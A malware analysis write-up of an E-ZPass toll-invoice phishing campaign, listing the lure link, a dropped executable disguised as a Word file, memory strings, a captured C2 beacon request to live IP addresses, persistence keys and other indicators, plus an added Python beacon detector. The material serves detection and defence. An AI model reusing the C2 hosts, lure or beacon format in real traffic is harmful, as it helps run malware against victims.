EZPass Spam Analysis

A quick breakdown of the stages of infection for E-ZPass spam.

Delivery:

Received a spam email with subject "Indebted for driving on toll road"

"Get Invoice" links to automuzika[.]lv/search.php?to=lx/[random chars]/[random chars]/qQ

Exploitation:

When the user clicks the Get Invoice link, a zip file is downloaded that appears to be dynamically named based on the downloader's location. In my case the zip file I received contained a file called E-ZPASS_[mytown]_[myzipcode].exe.

MD5 hash of the exe:

7ccebc21af323547c17325943ed8f300

The extracted file uses a Microsoft Word icon to trick the user into thinking it is a document file.

Installation:

7ccebc21af323547c17325943ed8f300 appears to be an unpacked executable. When run, it leaves behind an abandoned svchost.exe process.
Looking at the strings in memory with Process Hacker shows:

0xfe388, 13, For base!!!!!
0xfe398, 18, http://%[^:]:%d/%s
0xfe3b0, 72, Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
0xfe404, 49, Content-Type: application/x-www-form-urlencoded
0xfe438, 11, svchost.exe
0xfe53c, 19, %1024[^=]=%1024[^;]
0xfe778, 153, <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
0xff014, 12, You fag!!!!!
0xff108, 14, For group!!!!!
0x100048, 276, -----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDh1cXNl5TSGcC5OrnDBc+fdN/0
PblnZEAOlryK65eKdaNAIi0okxHTfCHKZQWEz8LOzQRclzg+SilO+jbesgZg/Y7U
c8edpo93cM0eyVE7Pi5n73I/lLyvD/gDby80FQmj1sbayyHR2DG8heeJJ2TRTfzD
r6V/45jRqvvUfgl+swIDAQAB
-----END PUBLIC KEY-----
0x100560, 18, 1.0.6, 6-Sept-2010
0x1be780, 30, 112.124.126.139
0x2b8a38, 36, http[:]//112.124.126.139:443/index.php
0x2b8ac8, 34, 46.4.105.170:8080
0x2b8b28, 38, 112.124.126.139:443
0x2b8dfa, 28, 12.124.126.139
0x2d86b8, 68, http://46.4.105.170:8080/index.php
0xa29818, 42, C:\Users\IEUser\AppData\Local\ikxohwnh.exe
0xa2e840, 14, nonenonenone

Command and Control:

Beacons to several IPs over port 443 and port 8080.

Example beacon request:

POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Host: 46.4.105.170:8080
Content-Length: 310
Cache-Control: no-cache

[310-byte body of non-printable, apparently encrypted data omitted]

Mitigations & Detections:

Host IOCs:

Abandoned svchost.exe process containing the strings listed above.

C:\Users\[username]\AppData\Local\[random chars].exe

Persistence Keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wnquanxa
HKCU\Software\euubsgsu\tcdstcsd

Network IOCs:

Email Address:

manager@gcalternativas.com

URIs:

POST requests to:

http[:]//[ip]:443/index.php
http[:]//[ip]:8080/index.php
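The request profile documented above (POST to /index.php on a bare IP at port 443 or 8080, the hard-coded Firefox 28 User-Agent, and a form-urlencoded Content-Type on an encrypted binary body) can be checked mechanically. The following Python is an added example, not part of the original writeup; the two sample requests are constructed, and 192.0.2.10 is a documentation address standing in for a C2 host.

```python
import re
# Beacon profile from the memory strings and the captured request above.
BEACON_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
BEACON_PORTS = {443, 8080}
# Host header that is a literal IPv4 address plus port, with no hostname.
BARE_IP_HOST = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}:(\d{1,5})")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    start, *hdrs = head.decode("latin-1").split("\r\n")
    method, path = start.split(" ")[:2]
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in hdrs)}
    return method, path, headers, body

def beacon_indicators(raw):
    """Return the profile elements a request matches (empty list = none)."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and path == "/index.php":
        hits.append("post_index_php")
    m = BARE_IP_HOST.fullmatch(headers.get("host", ""))
    if m and int(m.group(1)) in BEACON_PORTS:
        hits.append("bare_ip_host")
    if headers.get("user-agent") == BEACON_UA:
        hits.append("firefox28_ua")
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded") and body:
        # Form post with no key=value pairs and mostly non-printable bytes: the encrypted knock.
        printable = sum(32 <= b < 127 for b in body) / len(body)
        if b"=" not in body or printable < 0.8:
            hits.append("binary_body_as_form")
    return hits

def is_ezpass_beacon(raw):
    """Alert on the combined profile only, not on a lone POST /index.php."""
    hits = set(beacon_indicators(raw))
    return ({"post_index_php", "binary_body_as_form"} <= hits
            and bool({"bare_ip_host", "firefox28_ua"} & hits))

# Constructed sample requests (not captured traffic); 192.0.2.10 is a documentation address.
BEACON_SAMPLE = (b"POST /index.php HTTP/1.1\r\nHost: 192.0.2.10:8080\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n"
                 b"User-Agent: " + BEACON_UA.encode() + b"\r\n\r\n"
                 + bytes(range(0x80, 0x90)))
BENIGN_SAMPLE = (b"POST /index.php HTTP/1.1\r\nHost: www.example.com\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n"
                 b"User-Agent: curl/8.0\r\n\r\nuser=a&pass=b")
```

Feed it reassembled requests from a proxy log or pcap; a benign form post to /index.php with a hostname and a printable key=value body produces only the weak "post_index_php" hit and no alert.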

FQDNs:

automuzika.lv

Mutexes:

abUser
aaUser

Additional Analysis:

Malwr.com analysis of 7ccebc21af323547c17325943ed8f300